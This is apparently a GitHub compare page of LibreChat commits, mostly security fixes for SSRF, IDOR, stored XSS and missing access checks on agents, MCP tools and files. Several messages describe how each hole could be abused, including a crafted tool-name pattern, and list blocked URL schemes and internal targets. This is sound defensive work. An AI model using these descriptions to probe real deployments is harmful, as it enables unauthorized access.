Compare commits

..

39 commits

Author SHA1 Message Date
Danny Avila
8271055c2d
📦 chore: Bump @librechat/agents to v3.1.56 (#12258)
* 📦 chore: Bump `@librechat/agents` to v3.1.56

* chore: resolve type error, URL property check in isMCPDomainAllowed function
2026-03-15 23:51:41 -04:00
Danny Avila
acd07e8085
🗝️ fix: Exempt Admin-Trusted Domains from MCP OAuth Validation (#12255)
* fix: exempt allowedDomains from MCP OAuth SSRF checks (#12254)

The SSRF guard in validateOAuthUrl was context-blind — it blocked
private/internal OAuth endpoints even for admin-trusted MCP servers
listed in mcpSettings.allowedDomains. Add isHostnameAllowed() to
domain.ts and skip SSRF checks in validateOAuthUrl when the OAuth
endpoint hostname matches an allowed domain.

* refactor: thread allowedDomains through MCP connection stack

Pass allowedDomains from MCPServersRegistry through BasicConnectionOptions,
MCPConnectionFactory, and into MCPOAuthHandler method calls so the OAuth
layer can exempt admin-trusted domains from SSRF validation.

* test: add allowedDomains bypass tests and fix registry mocks

Add isHostnameAllowed unit tests (exact, wildcard, case-insensitive,
private IPs). Add MCPOAuthSecurity tests covering the allowedDomains
bypass for initiateOAuthFlow, refreshOAuthTokens, and revokeOAuthToken.
Update registry mocks to include getAllowedDomains.

* fix: enforce protocol/port constraints in OAuth allowedDomains bypass

Replace isHostnameAllowed (hostname-only check) with isOAuthUrlAllowed
which parses the full OAuth URL and matches against allowedDomains
entries including protocol and explicit port constraints — mirroring
isDomainAllowedCore's allowlist logic. Prevents a port-scoped entry
like 'https://auth.internal:8443' from also exempting other ports.

* test: cover auto-discovery and branch-3 refresh paths with allowedDomains

Add three new integration tests using a real OAuth test server:
- auto-discovered OAuth endpoints allowed when server IP is in allowedDomains
- auto-discovered endpoints rejected when allowedDomains doesn't match
- refreshOAuthTokens branch 3 (no clientInfo/config) with allowedDomains bypass

Also rename describe block from ephemeral issue number to durable name.

* docs: explain intentional absence of allowedDomains in completeOAuthFlow

Prevents future contributors from assuming a missing parameter during
security audits — URLs are pre-validated during initiateOAuthFlow.

* test: update initiateOAuthFlow assertion for allowedDomains parameter

* perf: avoid redundant URL parse for admin-trusted OAuth endpoints

Move isOAuthUrlAllowed check before the hostname extraction so
admin-trusted URLs short-circuit with a single URL parse instead
of two. The hostname extraction (new URL) is now deferred to the
SSRF-check path where it's actually needed.
2026-03-15 23:03:12 -04:00
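A minimal sketch of the `isOAuthUrlAllowed` matching described above — full-URL allowlist entries pin protocol and port, bare entries match by hostname only. The exact matching rules (including wildcard handling) live in the real `domain.ts`; this is an illustrative reduction, not the shipped code.

```javascript
// Sketch: an entry like 'auth.internal' matches by hostname; an entry like
// 'https://auth.internal:8443' also constrains protocol and explicit port,
// so it does not exempt the same host on other ports.
function isOAuthUrlAllowed(urlString, allowedDomains = []) {
  let url;
  try {
    url = new URL(urlString);
  } catch {
    return false; // unparseable OAuth URLs are never exempted
  }
  for (const entry of allowedDomains) {
    if (entry.includes('://')) {
      let allowed;
      try {
        allowed = new URL(entry);
      } catch {
        continue; // skip malformed allowlist entries
      }
      if (
        url.protocol === allowed.protocol &&
        url.hostname.toLowerCase() === allowed.hostname.toLowerCase() &&
        url.port === allowed.port
      ) {
        return true;
      }
    } else if (url.hostname.toLowerCase() === entry.toLowerCase()) {
      return true;
    }
  }
  return false;
}
```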
Danny Avila
8e8fb01d18
🧱 fix: Enforce Agent Access Control on Context and OCR File Loading (#12253)
* 🔏 fix: Apply agent access control filtering to context/OCR resource loading

The context/OCR file path in primeResources fetched files by file_id
without applying filterFilesByAgentAccess, unlike the file_search and
execute_code paths. Add filterFiles dependency injection to primeResources
and invoke it after getFiles to enforce consistent access control.

* fix: Wire filterFilesByAgentAccess into all agent initialization callers

Pass the filterFilesByAgentAccess function from the JS layer into the TS
initializeAgent → primeResources chain via dependency injection, covering
primary, handoff, added-convo, and memory agent init paths.

* test: Add access control filtering tests for primeResources

Cover filterFiles invocation with context/OCR files, verify filtering
rejects inaccessible files, and confirm graceful fallback when filterFiles,
userId, or agentId are absent.

* fix: Guard filterFilesByAgentAccess against ephemeral agent IDs

Ephemeral agents have no DB document, so getAgent returns null and the
access map defaults to all-false, silently blocking all non-owned files.
Short-circuit with isEphemeralAgentId to preserve the pass-through
behavior for inline-built agents (memory, tool agents).

* fix: Clean up resources.ts and JS caller import order

Remove redundant optional chain on req.user.role inside user-guarded
block, update primeResources JSDoc with filterFiles and agentId params,
and reorder JS imports to longest-to-shortest per project conventions.

* test: Strengthen OCR assertion and add filterFiles error-path test

Use toHaveBeenCalledWith for the OCR filtering test to verify exact
arguments after the OCR→context merge step. Add test for filterFiles
rejection to verify graceful degradation (logs error, returns original
tool_resources).

* fix: Correct import order in addedConvo.js and initialize.js

Sort by total line length descending: loadAddedAgent (91) before
filterFilesByAgentAccess (84), loadAgentTools (91) before
filterFilesByAgentAccess (84).

* test: Add unit tests for filterFilesByAgentAccess and hasAccessToFilesViaAgent

Cover every branch in permissions.js: ephemeral agent guard, missing
userId/agentId/files early returns, all-owned short-circuit, mixed
owned + non-owned with VIEW/no-VIEW, agent-not-found fail-closed,
author path scoped to attached files, EDIT gate on delete, DB error
fail-closed, and agent with no tool_resources.

* test: Cover file.user undefined/null in permissions spec

Files with no user field fall into the non-owned path and get run
through hasAccessToFilesViaAgent. Add two cases: attached file with
no user field is returned, unattached file with no user field is
excluded.
2026-03-15 23:02:36 -04:00
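The dependency-injection pattern described above can be reduced to a small sketch. The real `filterFilesByAgentAccess` is async and queries the database; here the injected filter is a plain function so the pass-through and error-path behavior is visible. Names and shapes are illustrative.

```javascript
// Sketch of the access-control injection in the context/OCR file path.
function filterAccessibleFiles({ files, filterFiles, userId, agentId }) {
  // Graceful fallback: without a filter function or identifying context,
  // return the files unchanged (pass-through behavior).
  if (!filterFiles || !userId || !agentId) {
    return files;
  }
  try {
    return filterFiles({ files, userId, agentId });
  } catch (error) {
    // Graceful degradation: log the error and return the original set.
    console.error('filterFiles failed', error);
    return files;
  }
}
```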
Danny Avila
6f87b49df8
🛂 fix: Enforce Actions Capability Gate Across All Event-Driven Tool Loading Paths (#12252)
* fix: gate action tools by actions capability in all code paths

Extract resolveAgentCapabilities helper to eliminate 3x-duplicated
capability resolution. Apply early action-tool filtering in both
loadToolDefinitionsWrapper and loadAgentTools non-definitions path.
Gate loadActionToolsForExecution in loadToolsForExecution behind an
actionsEnabled parameter with a cache-based fallback. Replace the
late capability guard in loadAgentTools with a hasActionTools check
to avoid unnecessary loadActionSets DB calls and duplicate warnings.

* fix: thread actionsEnabled through InitializedAgent type

Add actionsEnabled to the loadTools callback return type,
InitializedAgent, and the initializeAgent destructuring/return
so callers can forward the resolved value to loadToolsForExecution
without redundant getEndpointsConfig cache lookups.

* fix: pass actionsEnabled from callers to loadToolsForExecution

Thread actionsEnabled through the agentToolContexts map in
initialize.js (primary and handoff agents) and through
primaryConfig in the openai.js and responses.js controllers,
avoiding per-tool-call capability re-resolution on the hot path.

* test: add regression tests for action capability gating

Test the real exported functions (resolveAgentCapabilities,
loadAgentTools, loadToolsForExecution) with mocked dependencies
instead of shadow re-implementations. Covers definition filtering,
execution gating, actionsEnabled param forwarding, and fallback
capability resolution.

* test: use Constants.EPHEMERAL_AGENT_ID in ephemeral fallback test

Replaces a string guess with the canonical constant to avoid
fragility if the ephemeral detection heuristic changes.

* fix: populate agentToolContexts for addedConvo parallel agents

After processAddedConvo returns, backfill agentToolContexts for
any agents in agentConfigs not already present, so ON_TOOL_EXECUTE
for added-convo agents receives actionsEnabled instead of falling
back to a per-call cache lookup.
2026-03-15 23:01:36 -04:00
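The early action-tool filtering described above amounts to a capability gate over the tool list. A minimal sketch, with an assumed delimiter and helper name (the real code identifies action tools differently):

```javascript
// Hypothetical delimiter for this sketch only — the real identification of
// action tools in LibreChat is not reproduced here.
const ACTION_DELIMITER = '_action_';

// Drop action tools unless the 'actions' capability is enabled for the agent.
function gateActionTools(tools, capabilities) {
  const actionsEnabled = capabilities.includes('actions');
  if (actionsEnabled) {
    return tools;
  }
  return tools.filter((tool) => !tool.includes(ACTION_DELIMITER));
}
```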
Danny Avila
a26eeea592
🔏 fix: Enforce MCP Server Authorization on Agent Tool Persistence (#12250)
* 🛡️ fix: Validate MCP tool authorization on agent create/update

Agent creation and update accepted arbitrary MCP tool strings without
verifying the user has access to the referenced MCP servers. This allowed
a user to embed unauthorized server names in tool identifiers (e.g.
"anything_mcp_<victimServer>"), causing mcpServerNames to be stored on
the agent and granting consumeOnly access via hasAccessViaAgent().

Adds filterAuthorizedTools() that checks MCP tool strings against the
user's accessible server configs (via getAllServerConfigs) before
persisting. Applied to create, update, and duplicate agent paths.

* 🛡️ fix: Harden MCP tool authorization and add test coverage

Addresses review findings on the MCP agent tool authorization fix:

- Wrap getMCPServersRegistry() in try/catch so uninitialized registry
  gracefully filters all MCP tools instead of causing a 500 (DoS risk)
- Guard revertAgentVersionHandler: filter unauthorized MCP tools after
  reverting to a previous version snapshot
- Preserve existing MCP tools on collaborative updates: only validate
  newly added tools, preventing silent stripping of tools the editing
  user lacks direct access to
- Add audit logging (logger.warn) when MCP tools are rejected
- Refactor to single-pass lazy-fetch (registry queried only on first
  MCP tool encountered)
- Export filterAuthorizedTools for direct unit testing
- Add 18 tests covering: authorized/unauthorized/mixed tools, registry
  unavailable fallback, create/update/duplicate/revert handler paths,
  collaborative update preservation, and mcpServerNames persistence

* test: Add duplicate handler test, use Constants.mcp_delimiter, DB assertions

- N1: Add duplicateAgentHandler integration test verifying unauthorized
  MCP tools are stripped from the cloned agent and mcpServerNames are
  correctly persisted in the database
- N2: Replace all hardcoded '_mcp_' delimiter literals with
  Constants.mcp_delimiter to prevent silent false-positive tests if
  the delimiter value ever changes
- N3: Add DB state assertion to the revert-with-strip test confirming
  persisted tools match the response after unauthorized tools are
  removed

* fix: Enforce exact 2-segment format for MCP tool keys

Reject MCP tool keys with multiple delimiters to prevent
authorization/execution mismatch when `.pop()` vs `split[1]`
extract different server names from the same key.

* fix: Preserve existing MCP tools when registry is unavailable

When the MCP registry is uninitialized (e.g. server restart), existing
tools already persisted on the agent are preserved instead of silently
stripped. New MCP tools are still rejected when the registry cannot
verify them. Applies to duplicate and revert handlers via existingTools
param; update handler already preserves existing tools via its diff logic.
2026-03-15 20:08:34 -04:00
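The exact 2-segment rule from the last fix above can be sketched directly: with multiple delimiters, `.pop()` and `split[1]` disagree on the server name, so such keys are rejected outright. The commit confirms `'_mcp_'` as the value of `Constants.mcp_delimiter`; the parser name is illustrative.

```javascript
const MCP_DELIMITER = '_mcp_'; // value of Constants.mcp_delimiter per the commit

// A valid MCP tool key is exactly '<toolName>_mcp_<serverName>'.
// Keys with zero or multiple delimiters (or empty segments) are malformed.
function parseMCPToolKey(key) {
  const parts = key.split(MCP_DELIMITER);
  if (parts.length !== 2 || !parts[0] || !parts[1]) {
    return null;
  }
  return { toolName: parts[0], serverName: parts[1] };
}
```

Rejecting the ambiguous form, rather than picking one extraction, ensures authorization and execution can never resolve different server names from the same key.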
Airam Hernández Hernández
aee1ced817
🪙 fix: Resolve Azure AD Group Overage via OBO Token Exchange for OpenID (#12187)
When Azure AD users belong to 200+ groups, group claims are moved out of
the ID token (overage). The existing resolveGroupsFromOverage() called
Microsoft Graph directly with the app-audience access token, which Graph
rejected (401/403).

Changes:
- Add exchangeTokenForOverage() dedicated OBO exchange with User.Read scope
- Update resolveGroupsFromOverage() to exchange token before Graph call
- Add overage handling to OPENID_ADMIN_ROLE block (was silently failing)
- Share resolved overage groups between required role and admin role checks
- Always resolve via Graph when overage detected (even with partial groups)
- Remove debug-only bypass that forced Graph resolution
- Add tests for OBO exchange, caching, and admin role overage scenarios

Co-authored-by: Airam Hernández Hernández <airam.hernandez@intelequia.com>
2026-03-15 19:09:53 -04:00
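For context on the overage condition above: Azure AD signals group overage by omitting inline group claims and emitting `_claim_names`/`_claim_sources` markers in the token payload. A detection sketch (the helper name is illustrative, not from the PR):

```javascript
// Detect Azure AD group overage: the token carries _claim_names/_claim_sources
// pointing at a Graph endpoint instead of a complete inline 'groups' claim.
// Per the fix above, resolution via Graph happens whenever overage is
// detected, even if partial groups are present.
function hasGroupOverage(claims) {
  return Boolean(claims._claim_names?.groups && claims._claim_sources);
}
```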
Danny Avila
ad08df4db6
🔏 fix: Scope Agent-Author File Access to Attached Files Only (#12251)
* 🛡️ fix: Scope agent-author file access to attached files only

The hasAccessToFilesViaAgent helper short-circuited for agent authors,
granting access to all requested file IDs without verifying they were
attached to the agent's tool_resources. This enabled an IDOR where any
agent author could delete arbitrary files by supplying their agent_id
alongside unrelated file IDs.

Now both the author and non-author paths check file IDs against the
agent's tool_resources before granting access.

* chore: Use Object.values/for...of and add JSDoc in getAttachedFileIds

* test: Add boundary cases for agent file access authorization

- Agent with no tool_resources denies all access (fail-closed)
- Files across multiple resource types are all reachable
- Author + isDelete: true still scopes to attached files only
2026-03-15 18:54:34 -04:00
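The `getAttachedFileIds` helper mentioned above can be sketched with the `Object.values`/`for...of` style the commit names; the `tool_resources` shape shown is a simplified assumption:

```javascript
// Collect every file ID attached to an agent's tool_resources, e.g.
// { file_search: { file_ids: [...] }, execute_code: { file_ids: [...] } }.
// Both author and non-author paths then check requested IDs against this set.
function getAttachedFileIds(toolResources = {}) {
  const attached = new Set();
  for (const resource of Object.values(toolResources)) {
    for (const fileId of resource?.file_ids ?? []) {
      attached.add(fileId);
    }
  }
  return attached;
}
```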
Danny Avila
f7ab5e645a
🫷 fix: Validate User-Provided Base URL in Endpoint Init (#12248)
* 🛡️ fix: Block SSRF via user-provided baseURL in endpoint initialization

User-provided baseURL values (when endpoint is configured with
`user_provided`) were passed through to the OpenAI SDK without
validation. Combined with `directEndpoint`, this allowed arbitrary
server-side requests to internal/metadata URLs.

Adds `validateEndpointURL` that checks against known SSRF targets
and DNS-resolves hostnames to block private IPs. Applied in both
custom and OpenAI endpoint initialization paths.

* 🧪 test: Add validateEndpointURL SSRF tests

Covers unparseable URLs, localhost, private IPs, link-local/metadata,
internal Docker/K8s hostnames, DNS resolution to private IPs, and
legitimate public URLs.

* 🛡️ fix: Add protocol enforcement and import order fix

- Reject non-HTTP/HTTPS schemes (ftp://, file://, data:, etc.) in
  validateEndpointURL before SSRF hostname checks
- Document DNS rebinding limitation and fail-open semantics in JSDoc
- Fix import order in custom/initialize.ts per project conventions

* 🧪 test: Expand SSRF validation coverage and add initializer integration tests

Unit tests for validateEndpointURL:
- Non-HTTP/HTTPS schemes (ftp, file, data)
- IPv6 loopback, link-local, and unique-local addresses
- .local and .internal TLD hostnames
- DNS fail-open path (lookup failure allows request)

Integration tests for initializeCustom and initializeOpenAI:
- Guard fires when userProvidesURL is true
- Guard skipped when URL is system-defined or falsy
- SSRF rejection propagates and prevents getOpenAIConfig call

* 🐛 fix: Correct broken env restore in OpenAI initialize spec

process.env was captured by reference, not by value, making the
restore closure a no-op. Snapshot individual env keys before mutation
so they can be properly restored after each test.

* 🛡️ fix: Throw structured ErrorTypes for SSRF base URL validation

Replace plain-string Error throws in validateEndpointURL with
JSON-structured errors using type 'invalid_base_url' (matching new
ErrorTypes.INVALID_BASE_URL enum value). This ensures the client-side
Error component can look up a localized message instead of falling
through to the raw-text default.

Changes across workspaces:
- data-provider: add INVALID_BASE_URL to ErrorTypes enum
- packages/api: throwInvalidBaseURL helper emits structured JSON
- client: add errorMessages entry and localization key
- tests: add structured JSON format assertion

* 🧹 refactor: Use ErrorTypes enum key in Error.tsx for consistency

Replace bare string literal 'invalid_base_url' with computed property
[ErrorTypes.INVALID_BASE_URL] to match every other entry in the
errorMessages map.
2026-03-15 18:41:59 -04:00
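A condensed sketch of the validation order described above: scheme allowlist first, then SSRF hostname checks, throwing the structured `invalid_base_url` error. The DNS-resolution step (fail-open on lookup errors, per the JSDoc note) is omitted, and the private-range patterns are an abbreviated illustration of the real checks.

```javascript
// Abbreviated private/metadata hostname patterns for this sketch.
const PRIVATE_PATTERNS = [
  /^localhost$/i,
  /^127\./,
  /^10\./,
  /^172\.(1[6-9]|2\d|3[01])\./,
  /^192\.168\./,
  /^169\.254\./, // link-local, including cloud metadata 169.254.169.254
  /^\[?::1\]?$/,
];

function validateEndpointURL(baseURL) {
  const fail = () => {
    // Structured JSON error so the client Error component can localize it.
    throw new Error(JSON.stringify({ type: 'invalid_base_url' }));
  };
  let url;
  try {
    url = new URL(baseURL);
  } catch {
    fail();
  }
  // Reject non-HTTP/HTTPS schemes before any hostname check.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    fail();
  }
  if (PRIVATE_PATTERNS.some((re) => re.test(url.hostname))) {
    fail();
  }
  return url;
}
```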
Danny Avila
f9927f0168
📑 fix: Sanitize Markdown Artifacts (#12249)
* 🛡️ fix: Sanitize markdown artifact rendering to prevent stored XSS

Replace marked-react with react-markdown + remark-gfm for artifact
markdown preview. react-markdown's skipHtml strips raw HTML tags,
and a urlTransform guard blocks javascript: and data: protocol links.

* fix: Update useArtifactProps test to expect react-markdown dependencies

* fix: Harden markdown artifact sanitization

- Convert isSafeUrl from denylist to allowlist (http, https, mailto, tel
  plus relative/anchor URLs); unknown protocols are now fail-closed
- Add remark-breaks to restore single-newline-to-<br> behavior that was
  silently dropped when replacing marked-react
- Export isSafeUrl from the host module and add 16 direct unit tests
  covering allowed protocols, blocked schemes (javascript, data, blob,
  vbscript, file, custom), edge cases (empty, whitespace, mixed case)
- Hoist remarkPlugins to a module-level constant to avoid per-render
  array allocation in the generated Sandpack component
- Fix import order in generated template (shortest to longest per
  AGENTS.md) and remove pre-existing trailing whitespace

* fix: Return null for blocked URLs, add sync-guard comments and test

- urlTransform returns null (not '') for blocked URLs so react-markdown
  omits the href/src attribute entirely instead of producing <a href="">
- Hoist urlTransform to module-level constant alongside remarkPlugins
- Add JSDoc sync-guard comments tying the exported isSafeUrl to its
  template-string mirror, so future maintainers know to update both
- Add synchronization test asserting the embedded isSafeUrl contains the
  same allowlist set, URL parsing, and relative-path checks as the export
2026-03-15 18:40:42 -04:00
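The allowlist behavior of `isSafeUrl` described above can be sketched as follows — allowed protocols plus relative/anchor URLs, everything else fail-closed. This is a reduction for illustration, not the exported implementation.

```javascript
// Allowlist: only these absolute-URL schemes survive; unknown protocols
// (javascript:, data:, blob:, vbscript:, file:, custom) are fail-closed.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:', 'mailto:', 'tel:']);

function isSafeUrl(value) {
  const trimmed = (value ?? '').trim();
  if (!trimmed) {
    return false; // empty / whitespace-only input
  }
  try {
    const url = new URL(trimmed);
    return ALLOWED_PROTOCOLS.has(url.protocol.toLowerCase());
  } catch {
    // Not parseable as an absolute URL: treat as a relative path or #anchor.
    return true;
  }
}
```

Paired with react-markdown's `urlTransform`, returning null for blocked URLs omits the `href`/`src` attribute entirely instead of emitting an empty one.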
Danny Avila
bcf45519bd
🪪 fix: Enforce VIEW ACL on Agent Edge References at Write and Runtime (#12246)
* 🛡️ fix: Enforce ACL checks on handoff edge and added-convo agent loading

Edge-linked agents and added-convo agents were fetched by ID via
getAgent without verifying the requesting user's access permissions.
This allowed an authenticated user to reference another user's private
agent in edges or addedConvo and have it initialized at runtime.

Add checkPermission(VIEW) gate in processAgent before initializing
any handoff agent, and in processAddedConvo for non-ephemeral added
agents. Unauthorized agents are logged and added to skippedAgentIds
so orphaned-edge filtering removes them cleanly.

* 🛡️ fix: Validate edge agent access at agent create/update time

Reject agent create/update requests that reference agents in edges
the requesting user cannot VIEW. This provides early feedback and
prevents storing unauthorized agent references as defense-in-depth
alongside the runtime ACL gate in processAgent.

Add collectEdgeAgentIds utility to extract all unique agent IDs from
an edge array, and validateEdgeAgentAccess helper in the v1 handler.

* 🧪 test: Improve ACL gate test coverage and correctness

- Add processAgent ACL gate tests for initializeClient (skip/allow handoff agents)
- Fix addedConvo.spec.js to mock loadAddedAgent directly instead of getAgent
- Seed permMap with ownedAgent VIEW bits in v1.spec.js update-403 test

* 🧹 chore: Remove redundant addedConvo ACL gate (now in middleware)

PR #12243 moved the addedConvo agent ACL check upstream into
canAccessAgentFromBody middleware, making the runtime check in
processAddedConvo and its spec redundant.

* 🧪 test: Rewrite processAgent ACL test with real DB and minimal mocking

Replace heavy mock-based test (12 mocks, Providers.XAI crash) with
MongoMemoryServer-backed integration test that exercises real getAgent,
checkPermission, and AclEntry — only external I/O (initializeAgent,
ToolService, AgentClient) remains mocked. Load edge utilities directly
from packages/api/src/agents/edges to sidestep the config.ts barrel.

* 🧪 fix: Use requireActual spread for @librechat/agents and @librechat/api mocks

The Providers.XAI crash was caused by mocking @librechat/agents with
a minimal replacement object, breaking the @librechat/api initialization
chain. Match the established pattern from client.test.js and
recordCollectedUsage.spec.js: spread jest.requireActual for both
packages, overriding only the functions under test.
2026-03-15 18:08:57 -04:00
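The `collectEdgeAgentIds` utility mentioned above reduces to a de-duplicating walk over the edge array. The edge shape used here (`{ to }`) is an assumption for illustration; the real type lives in `packages/api/src/agents/edges`.

```javascript
// Extract all unique agent IDs referenced by an edge array, so each can be
// checked for VIEW access at create/update time.
function collectEdgeAgentIds(edges = []) {
  const ids = new Set();
  for (const edge of edges) {
    if (typeof edge?.to === 'string' && edge.to) {
      ids.add(edge.to);
    }
  }
  return [...ids];
}
```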
Danny Avila
1312cd757c
🛡️ fix: Validate User-provided URLs for Web Search (#12247)
* 🛡️ fix: SSRF-validate user-provided URLs in web search auth

User-controlled URL fields (jinaApiUrl, firecrawlApiUrl, searxngInstanceUrl)
flow from plugin auth into outbound HTTP requests without validation.
Reuse existing isSSRFTarget/resolveHostnameSSRF to block private/internal
targets while preserving admin-configured (env var) internal URLs.

* 🛡️ fix: Harden web search SSRF validation

- Reject non-HTTP(S) schemes (file://, ftp://, etc.) in isSSRFUrl
- Conditional write: only assign to authResult after SSRF check passes
- Move isUserProvided tracking after SSRF gate to avoid false positives
- Add authenticated assertions for optional-field SSRF blocks in tests
- Add file:// scheme rejection test
- Wrap process.env mutation in try/finally guard
- Add JSDoc + sync-obligation comment on WEB_SEARCH_URL_KEYS

* 🛡️ fix: Correct auth-type reporting for SSRF-stripped optional URLs

SSRF-stripped optional URL fields no longer pollute isUserProvided.
Track whether the field actually contributed to authResult before
crediting it as user-provided, so categories report SYSTEM_DEFINED
when all surviving values match env vars.
2026-03-15 18:05:08 -04:00
Danny Avila
8dc6d60750
🛡️ fix: Enforce MULTI_CONVO and agent ACL checks on addedConvo (#12243)
* 🛡️ fix: Enforce MULTI_CONVO and agent ACL checks on addedConvo

addedConvo.agent_id was passed through to loadAddedAgent without any
permission check, enabling an authenticated user to load and execute
another user's private agent via the parallel multi-convo feature.

The middleware now chains a checkAddedConvoAccess gate after the primary
agent check: when req.body.addedConvo is present it verifies the user
has MULTI_CONVO:USE role permission, and when the addedConvo agent_id is
a real (non-ephemeral) agent it runs the same canAccessResource ACL
check used for the primary agent.

* refactor: Harden addedConvo middleware and avoid duplicate agent fetch

- Convert checkAddedConvoAccess to curried factory matching Express
  middleware signature: (requiredPermission) => (req, res, next)
- Call checkPermission directly for the addedConvo agent instead of
  routing through canAccessResource's tempReq pattern; this avoids
  orphaning the resolved agent document and enables caching it on
  req.resolvedAddedAgent for downstream loadAddedAgent
- Update loadAddedAgent to use req.resolvedAddedAgent when available,
  eliminating a duplicate getAgent DB call per chat request
- Validate addedConvo is a plain object and agent_id is a string
  before passing to isEphemeralAgentId (prevents TypeError on object
  injection, returns 400-equivalent early exit instead of 500)
- Fix JSDoc: "VIEW access" → "same permission as primary agent",
  add @param/@returns to helpers, restore @example on factory
- Fix redundant return await in resolveAgentIdFromBody

* test: Add canAccessAgentFromBody spec covering IDOR fix

26 integration tests using MongoMemoryServer with real models, ACL
entries, and PermissionService — no mocks for core logic.

Covered paths:
- Factory validation (requiredPermission type check)
- Primary agent: missing agent_id, ephemeral, non-agents endpoint
- addedConvo absent / invalid shape (string, array, object injection)
- MULTI_CONVO:USE gate: denied, missing role, ADMIN bypass
- Agent resource ACL: no ACL → 403, insufficient bits → 403,
  nonexistent agent → 404, valid ACL → next + cached on req
- End-to-end: both real agents, primary denied short-circuits,
  ephemeral primary + real addedConvo
2026-03-15 17:12:45 -04:00
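The curried-factory shape described in the refactor above looks roughly like this sketch — configuration first, then the standard Express `(req, res, next)` signature. The permission and ACL logic is reduced to placeholders; the type-check semantics (a numeric permission bitmask) are an assumption.

```javascript
// Curried middleware factory: (requiredPermission) => (req, res, next).
function checkAddedConvoAccess(requiredPermission) {
  if (typeof requiredPermission !== 'number') {
    throw new Error('requiredPermission must be a permission bitmask');
  }
  return async function middleware(req, res, next) {
    const addedConvo = req.body?.addedConvo;
    if (addedConvo == null) {
      return next(); // nothing to check
    }
    // Validate shape before touching agent_id: prevents TypeError on
    // object injection (early 400 instead of a 500).
    if (typeof addedConvo !== 'object' || Array.isArray(addedConvo)) {
      return res.status(400).json({ error: 'Invalid addedConvo' });
    }
    // ...MULTI_CONVO:USE role check and agent ACL check would go here,
    // caching the resolved agent on req for downstream loadAddedAgent...
    return next();
  };
}
```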
Danny Avila
07d0ce4ce9
🪤 fix: Fail-Closed MCP Domain Validation for Unparseable URLs (#12245)
* 🛡️ fix: Fail-closed MCP domain validation for unparseable URLs

`isMCPDomainAllowed` returned true (allow) when `extractMCPServerDomain`
could not parse the URL, treating it identically to a stdio transport.
A URL containing template placeholders or invalid syntax bypassed the
domain allowlist, then `processMCPEnv` resolved it to a valid—and
potentially disallowed—host at connection time.

Distinguish "no URL" (stdio, allowed) from "has URL but unparseable"
(rejected when an allowlist is active) by checking whether `config.url`
is an explicit non-empty string before falling through to the stdio path.

When no allowlist is configured the guard does not fire—unparseable URLs
fall through to connection-level SSRF protection via
`createSSRFSafeUndiciConnect`, preserving legitimate `customUserVars`
template-URL configs.

* test: Expand MCP domain validation coverage for invalid/templated URLs

Cover all branches of the fail-closed guard:
- Invalid/templated URLs rejected when allowlist is configured
- Invalid/templated URLs allowed when no allowlist (null/undefined/[])
- Whitespace-only and empty-string URLs treated as absent across all
  allowedDomains configurations
- Stdio configs (no url property) remain allowed
2026-03-15 17:08:43 -04:00
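The three-way distinction above — no URL (stdio, allowed), unparseable URL with an active allowlist (rejected), unparseable URL with no allowlist (allowed, deferred to connection-level SSRF protection) — can be sketched as:

```javascript
// Illustrative reduction of the fail-closed guard; the real matching in
// isMCPDomainAllowed supports richer allowlist entries than exact hostnames.
function isMCPDomainAllowed(config, allowedDomains) {
  const hasAllowlist = Array.isArray(allowedDomains) && allowedDomains.length > 0;
  const rawUrl = typeof config.url === 'string' ? config.url.trim() : '';
  if (!rawUrl) {
    return true; // stdio transport: no URL to validate
  }
  let hostname;
  try {
    hostname = new URL(rawUrl).hostname;
  } catch {
    // Has a URL but it is unparseable (e.g. template placeholders):
    // fail closed only when an allowlist is active.
    return !hasAllowlist;
  }
  if (!hasAllowlist) {
    return true; // no allowlist configured: the guard does not fire
  }
  return allowedDomains.some((d) => d.toLowerCase() === hostname.toLowerCase());
}
```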
Danny Avila
a0b4949a05
🛡️ fix: Cover full fe80::/10 link-local range in IPv6 check (#12244)
* 🛡️ fix: Cover full fe80::/10 link-local range in SSRF IPv6 check

The `isPrivateIP` check used `startsWith('fe80')` which only matched
fe80:: but missed fe90::–febf:: (the rest of the RFC 4291 fe80::/10
link-local block). Replace with a proper bitwise hextet check.

* 🛡️ fix: Guard isIPv6LinkLocal against parseInt partial-parse on hostnames

parseInt('fe90.example.com', 16) stops at the dot and returns 0xfe90,
which passes the bitmask check and false-positives legitimate domains.

Add colon-presence guard (IPv6 literals always contain ':') and a hex
regex validation on the first hextet before parseInt.

Also document why fc/fd use startsWith while fe80::/10 needs bitwise.

* test: Harden IPv6 link-local SSRF tests with false-positive guards

- Assert fe90/fea0/febf hostnames are NOT blocked (regression guard)
- Add feb0::1 and bracket form [fe90::1] to isPrivateIP coverage
- Extend resolveHostnameSSRF tests for fe90::1 and febf::1
2026-03-15 17:07:55 -04:00
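The hardened check described above combines three guards: a colon-presence test (IPv6 literals always contain `:`), a hex validation of the first hextet (so `parseInt('fe90.example.com', 16)` partial-parsing cannot false-positive), and the actual fe80::/10 bitmask. A sketch of that logic:

```javascript
// fe80::/10 covers fe80:: through febf:: (RFC 4291), so a prefix
// comparison is insufficient; the top 10 bits must be masked and compared.
function isIPv6LinkLocal(host) {
  const literal = host.replace(/^\[|\]$/g, ''); // strip URL bracket form
  if (!literal.includes(':')) {
    return false; // not an IPv6 literal (guards against hostnames)
  }
  const firstHextet = literal.split(':')[0];
  if (!/^[0-9a-f]{1,4}$/i.test(firstHextet)) {
    return false; // guard against parseInt partial-parse
  }
  const value = parseInt(firstHextet, 16);
  // Top 10 bits must equal 1111111010 (0xfe80 under mask 0xffc0).
  return (value & 0xffc0) === 0xfe80;
}
```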
Danny Avila
a01959b3d2
🛰️ fix: Cross-Replica Created Event Delivery (#12231)
* fix: emit created event from metadata on cross-replica subscribe

In multi-instance Redis deployments, the created event (which triggers
sidebar conversation creation) was lost when the SSE subscriber connected
to a different instance than the one generating. The event was only in
the generating instance's local earlyEventBuffer and the Redis pub/sub
message was already gone by the time the subscriber's channel was active.

When subscribing cross-replica (empty buffer, Redis mode, userMessage
already in job metadata), reconstruct and emit the created event
directly from stored metadata.

* test: add skipBufferReplay regression guard for cross-replica created event

Add test asserting the resume path (skipBufferReplay: true) does NOT
emit a created event on cross-replica subscribe — prevents the
duplication fix from PR #12225 from regressing. Add explanatory JSDoc
on the cross-replica fallback branch documenting which fields are
preserved from trackUserMessage() and why sender/isCreatedByUser
are hardcoded.

* refactor: replace as-unknown-as casts with discriminated ServerSentEvent union

Split ServerSentEvent into StreamEvent | CreatedEvent | FinalEvent so
event shapes are statically typed. Removes all as-unknown-as casts in
GenerationJobManager and test file; narrows with proper union members
where properties are accessed.

